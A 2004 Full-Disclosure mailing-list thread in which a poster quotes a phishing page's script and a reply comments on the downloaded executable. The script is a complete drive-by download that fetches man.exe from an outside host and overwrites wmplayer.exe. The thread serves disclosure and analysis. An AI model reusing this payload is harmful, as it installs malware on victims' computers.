if you look at the symbols from that exe, they are look dodge. RegQueryValueExA ShellExecuteA 4FtpPutFileA
also appears to have a base64 payload inside it. and i only used strings for that its to hot to do any real work .. ----- Original Message ----- From: "axid3j1al axid3j1al" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Tuesday, February 03, 2004 4:40 PM Subject: [Full-Disclosure] Old Hack? > Has anyone see this little code injection hack. > > Is this old? > > > Email has subject line "congranulations! you won $1169" > > with body > > http://sinaraevent.com/bbs/zipcode/6.htm > > > and code > > <textarea id="code" style="display:none;"> > > var x = new ActiveXObject("Microsoft.XMLHTTP"); > x.Open("GET", "http://sinaraevent.com/bbs/zipcode/man.exe",0); > x.Send(); > > var s = new ActiveXObject("ADODB.Stream"); > s.Mode = 3; > s.Type = 1; > s.Open(); > s.Write(x.responseBody); > > s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2); > location.href = "mms://"; > > </textarea> > > <script language="javascript"> > > function preparecode(code) { > result = ''; > lines = code.split(/\r\n/); > for (i=0;i<lines.length;i++) { > > line = lines[i]; > line = line.replace(/^\s+/,""); > line = line.replace(/\s+$/,""); > line = line.replace(/'/g,"\\'"); > line = line.replace(/[\\]/g,"\\\\"); > line = line.replace(/[/]/g,"%2f"); > > if (line != '') { > result += line +'\\r\\n'; > } > } > return result; > } > > function doit() { > mycode = preparecode(document.all.code.value); > myURL = "file:javascript:eval('" + mycode + "')"; > window.open(myURL,"_media") > } > > > window.open("error.jsp","_media"); > > setTimeout("doit()", 5000); > > > </script> > > braindwish has expired > > _________________________________________________________________ > Hot chart ringtones and polyphonics. Go to > http://ninemsn.com.au/mobilemania/default.asp > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
